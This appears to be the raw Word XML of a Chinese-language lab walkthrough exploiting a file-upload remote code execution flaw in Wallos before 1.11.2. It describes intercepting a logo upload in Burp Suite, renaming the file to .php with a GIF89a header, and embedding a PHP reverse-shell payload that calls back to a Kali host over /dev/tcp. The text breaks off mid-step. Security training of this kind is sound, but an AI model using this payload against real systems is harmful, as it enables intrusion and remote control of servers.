          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D582E5C" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00D46701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152190A" wp14:editId="6E2689E1">
            <wp:extent cx="5274310" cy="3907155"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1639238850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38850" name="图片 1" descr="图形用户界面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CB13" w14:textId="450D2DC6" w:rsidR="00D46701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292FBD75" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="0065289E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EB208DA" wp14:editId="6DEF3949">
            <wp:extent cx="5274310" cy="3006090"/>
            <wp:effectExtent l="0" t="0" r="2540" b="3810"/>
            <wp:docPr id="75170877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08778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ECD1" w14:textId="1CE891AC" w:rsidR="0065289E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3DA6C6B7" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="000A7BDF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3EB07669" wp14:editId="0F54418A">
            <wp:extent cx="5274310" cy="2106295"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="8364242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2420" name="图片 1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B953" w14:textId="2B5F044E" w:rsidR="000976FB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7A06ED5F" w14:textId="7734F362" w:rsidR="000976FB" w:rsidRDefault="000976FB" w:rsidP="000976FB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访问</w:t>
      </w:r>
      <w:hyperlink r:id="rId21" w:history="1">
        <w:r w:rsidRPr="006B1D77">
          <w:rPr>
            <w:rStyle w:val="af6"/>
            <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
            <w:sz w:val="24"/>
          </w:rPr>
          <w:t>https://www.exploit-db.com/</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>查找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wallos</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00FC2089">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，发现确实存在</w:t>
      </w:r>
      <w:r w:rsidR="00FC2089">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>1.11.2</w:t>
      </w:r>
      <w:r w:rsidR="00FC2089">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>版本之前的漏洞</w:t>
      </w:r>
      <w:r w:rsidR="00091849">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="001F6624">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>打开阅读后发现该漏洞是一个</w:t>
      </w:r>
      <w:r w:rsidR="00E202D9">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>文件上传</w:t>
      </w:r>
      <w:r w:rsidR="00E302AE">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>远程代码执行漏洞，通过添加</w:t>
      </w:r>
      <w:r w:rsidR="00A75BC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>订阅（</w:t>
      </w:r>
      <w:r w:rsidR="00A75BC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>subscription</w:t>
      </w:r>
      <w:r w:rsidR="00A75BC3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>）时</w:t>
      </w:r>
      <w:r w:rsidR="00353388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>上</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00353388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>传图片</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="00353388">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的功能以上传恶意文件。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60D763A7" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00FC2089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35EE1A20" wp14:editId="5D170FB5">
            <wp:extent cx="5274310" cy="611505"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="474897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979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F60E" w14:textId="7B0F9B14" w:rsidR="00FC2089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14:paraId="311CD376" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="007358D6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6759039" wp14:editId="0717247A">
            <wp:extent cx="5274310" cy="4925695"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8255"/>
            <wp:docPr id="45282207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22070" name="图片 1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B14D" w14:textId="2F61D426" w:rsidR="0034110A" w:rsidRDefault="00B024AF" w:rsidP="00B024AF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14:paraId="4E7AAF2C" w14:textId="0ADAD160" w:rsidR="004B64B4" w:rsidRDefault="00BE13A6" w:rsidP="00BE13A6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BE13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实施攻击</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FC7527B" w14:textId="0442C0FE" w:rsidR="00D53035" w:rsidRPr="00BE13A6" w:rsidRDefault="00794620" w:rsidP="00D53035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抓取正常文件上传报文</w:t>
      </w:r>
      <w:r w:rsidR="00A81F3D" w:rsidRPr="00BE13A6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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63A44637" w14:textId="6D667FBA" w:rsidR="00794620" w:rsidRDefault="00794620" w:rsidP="001627C5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burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004B13EA">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>抓包查看，</w:t>
      </w:r>
      <w:r w:rsidR="00C52675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>点击添加一个订阅，然后输入必须输入的</w:t>
      </w:r>
      <w:r w:rsidR="0034110A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>部分</w:t>
      </w:r>
      <w:r w:rsidR="00C52675">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00740778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>选择</w:t>
      </w:r>
      <w:r w:rsidR="00740778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>upload logo</w:t>
      </w:r>
      <w:r w:rsidR="00740778">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，随意选择一个正常的图片，</w:t>
      </w:r>
      <w:r w:rsidR="00416A97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>开启</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="005C3E0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>burpsuite</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00416A97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>拦截，</w:t>
      </w:r>
      <w:r w:rsidR="005C3E0E">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后点击</w:t>
      </w:r>
      <w:r w:rsidR="00416A97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>save</w:t>
      </w:r>
      <w:r w:rsidR="00416A97">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>保存</w:t>
      </w:r>
      <w:r w:rsidR="0015402C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，此时便拦截到这个</w:t>
      </w:r>
      <w:r w:rsidR="00F20338">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>提交正常图片的数据包。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1088D136" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="00C52675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5B2BD0C" wp14:editId="1F2749B7">
            <wp:extent cx="3913198" cy="4556760"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="2134054136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54136" name="图片 1" descr="图片包含 图示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3725" cy="45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50E0" w14:textId="33BE522C" w:rsidR="00C52675" w:rsidRDefault="00B024AF" w:rsidP="00B024AF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14:paraId="54E34D9A" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="004B78ED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21A1345" wp14:editId="70625F1B">
            <wp:extent cx="5274310" cy="3195320"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="935892859" name="图片 1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92859" name="图片 1" descr="电脑软件截图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D2F1" w14:textId="2F102403" w:rsidR="004B78ED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14:paraId="44E2CE20" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="0015402C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F3A565D" wp14:editId="686E71BF">
            <wp:extent cx="5274310" cy="3643630"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="83186615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66152" name="图片 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B552" w14:textId="70E91C12" w:rsidR="0015402C" w:rsidRDefault="00B024AF" w:rsidP="00B024AF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14:paraId="604897CB" w14:textId="295DB3ED" w:rsidR="0075603A" w:rsidRPr="00E25C30" w:rsidRDefault="00B65FB7" w:rsidP="00E25C30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上传</w:t>
      </w:r>
      <w:r w:rsidR="001432AD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恶意脚本文件</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A4839BF" w14:textId="2290DFB0" w:rsidR="00601A05" w:rsidRDefault="00A53A68" w:rsidP="0036060A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查询到的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wallos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漏洞利用方法，</w:t>
      </w:r>
      <w:r w:rsidR="009569EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>摁</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="009569EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>crtl+r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将该报文发送到</w:t>
      </w:r>
      <w:r w:rsidR="009569EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>重放器（</w:t>
      </w:r>
      <w:r w:rsidR="009569EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>repeater</w:t>
      </w:r>
      <w:r w:rsidR="009569EB">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>）</w:t>
      </w:r>
      <w:r w:rsidR="00591DEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00591DEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>修改</w:t>
      </w:r>
      <w:r w:rsidR="00CC3E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>filename</w:t>
      </w:r>
      <w:r w:rsidR="00CC3E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的后缀为</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00CC3E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00CC3E67">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00591DEC" w:rsidRPr="00591DEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Content-Type</w:t>
      </w:r>
      <w:r w:rsidR="00591DEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>字段为</w:t>
      </w:r>
      <w:r w:rsidR="00591DEC">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>image/jpeg</w:t>
      </w:r>
      <w:r w:rsidR="006E4AA8">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，回车后添加</w:t>
      </w:r>
      <w:r w:rsidR="0094577C" w:rsidRPr="0094577C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>GIF89a;</w:t>
      </w:r>
      <w:r w:rsidR="0036060A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，再回车后添加</w:t>
      </w:r>
      <w:r w:rsidR="0094577C" w:rsidRPr="0094577C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>&lt;?</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094577C" w:rsidRPr="0094577C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0036060A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gramStart"/>
      <w:r w:rsidR="0094577C" w:rsidRPr="0094577C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidR="0094577C" w:rsidRPr="0094577C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>'/bin/bash -c "bash -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094577C" w:rsidRPr="0094577C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094577C" w:rsidRPr="0094577C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> &gt;&amp; /dev/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="0094577C" w:rsidRPr="0094577C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="0094577C" w:rsidRPr="0094577C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>/192.168.6.149/6666 0&gt;&amp;1"');</w:t>
      </w:r>
      <w:r w:rsidR="0036060A">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="0094577C" w:rsidRPr="0094577C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>?&gt;</w:t>
      </w:r>
      <w:r w:rsidR="009670B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00207C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>这是一个反弹</w:t>
      </w:r>
      <w:r w:rsidR="00207C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidR="00207C83">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的命令，</w:t>
      </w:r>
      <w:r w:rsidR="002217D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>其中</w:t>
      </w:r>
      <w:r w:rsidR="002217D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>192.168.6.149</w:t>
      </w:r>
      <w:r w:rsidR="002217D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidR="002217D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidR="002217D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>的</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="002217D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>ip</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="002217D3">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="009670B5">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>然后点击发送。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B4EA9E9" w14:textId="77777777" w:rsidR="00B024AF" w:rsidRDefault="0036060A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083C2B8" wp14:editId="295794D1">
            <wp:extent cx="5274310" cy="1489710"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="1156643625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43625" name="图片 1" descr="文本&#10;&#10;中度可信度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70AB" w14:textId="24456579" w:rsidR="00601A05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14:paraId="26294F9D" w14:textId="1FA63C49" w:rsidR="00A06147" w:rsidRPr="0003461D" w:rsidRDefault="0003461D" w:rsidP="0003461D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3461D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获取</w:t>
      </w:r>
      <w:r w:rsidRPr="0003461D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www-data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</w:t>
      </w:r>
      <w:r w:rsidRPr="0003461D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shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="469E3580" w14:textId="15528862" w:rsidR="00B21FFF" w:rsidRDefault="00B21FFF" w:rsidP="00B21FFF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21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>访问</w:t>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:instrText>HYPERLINK "http://192.168.6.150/images/uploads/logos/"</w:instrText>
      </w:r>
      <w:r w:rsidR="00B024AF" w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:t>http://192.168.6.150/images/uploads/logos/</w:t>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>，发现存在一个新的文件（前边的几个文件是测试上传，正常情况下没有），此时在</w:t>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00B21FFF">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="宋体" w:hAnsi="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
